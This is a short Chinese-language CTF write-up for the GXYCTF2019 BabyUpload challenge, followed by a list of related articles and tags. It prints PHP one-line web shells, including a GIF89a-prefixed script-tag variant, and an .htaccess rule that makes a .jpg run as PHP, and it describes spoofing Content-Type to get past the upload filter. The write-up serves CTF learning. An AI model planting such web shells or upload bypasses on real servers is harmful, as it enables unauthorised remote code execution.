[GXYCTF2019]BabyUpload

打开靶场看到个上传文件的选项，应该是上传文件漏洞

上传个一句话木马文件尝试

<?php eval($_POST['cmd']);?>

提示不能带有php的后缀

改成jpg后缀，提示“上传类型也太露骨了吧！”

修改了Content-Type为image/jpeg还是不行

换了一种一句话木马

GIF89a
<script language='php'>@eval($_POST['cmd'])</script>

此时上传成功

但是图片无法解析为php

使用.htaccess将文件解析为php

<FilesMatch "d.jpg">
SetHandler application/x-httpd-php
</FilesMatch>

这里注意还是需要修改下Content-Type，否则还是会提示上传类型露骨

然后再上传一句话木马

此时通过蚁剑连接，在根目录下找到flag

本栏目推荐文章
• P5321 [BJOI2019] 送别 题解--zhengjun
• [GXYCTF2019]BabySQli
• [Keyence2019] Paper Cutting
• Windows Server 2016 & 2019 工作站速配脚本
• 洛谷 P5359 [SDOI2019] 染色
• 板刷 2019~？的省选题
• [GXYCTF2019]BabyUpload
• [极客大挑战 2019]Secret File 1
• [SUCTF 2019]EasySQL 1
• [强网杯 2019]随便注 1

BabyUpload GXYCTF 2019babyupload gxyctf 2019 ping gxyctf 2019 babysqli gxyctf 2019 babysqli buuctf gxyctf 2019 luck_guy reverse gxyctf 2019 gxyctf 2019 ping buuctf gxyctf 2019 babyupload gxyctf babyupload nisactf 2022